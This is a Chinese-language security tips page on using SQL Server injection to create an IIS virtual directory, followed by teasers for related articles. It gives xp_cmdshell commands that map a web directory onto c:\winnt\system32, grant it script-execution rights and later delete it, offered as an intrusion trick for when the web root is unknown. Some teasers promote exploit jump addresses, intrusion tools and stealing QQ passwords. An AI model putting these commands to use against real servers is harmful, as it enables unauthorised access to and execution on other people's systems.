sql server注入建立虚拟目录的方法
所属分类:
实用技巧 / 安全教程
阅读数:
1644
收藏 0赞 0分享
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://xxx.com/win
403错误,表示虚拟目录建好了。。。
一些通用跳转地址,XXOXX的时候有点用
近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
收藏 0赞 0分享
入侵过程中用过的三大门派的几个小工具[推荐]
vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
收藏 0赞 0分享
如何防范别人盗你的qq号(盗别人的qq密码)
想用别人的 qq号码,最主要的就是把别人的密码偷来,那么怎么盗别人的qq密码呢?不过,没有人会告诉你:我的密码是什么什么,请你尽情的用我的号码吧!那么,黑客是怎么去把别人的密码偷来呢
收藏 0赞 0分享
QQ聊天记录删除了怎么恢复 详细步骤教程
许多网友都想知道“QQ聊天记录删除了怎么恢复”,因为QQ聊天记录对于我们来说是很重要的数据。下面我们就来介绍下如何解决QQ聊天记录删除恢复的问题
收藏 0赞 0分享
php+mysql注入页面实现
最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧
收藏 0赞 0分享
QQ密码被盗怎么办 (教你如何找回QQ密码)
QQ密码保护是一套保障QQ密码安全的机制。通过给你的QQ号填写对应的相关资料,如证件号、安全提示问题、安全邮箱等,给你的QQ号穿一件防弹衣。一旦出现问题,就可以通过QQ密码保护找回QQ密码
收藏 0赞 0分享
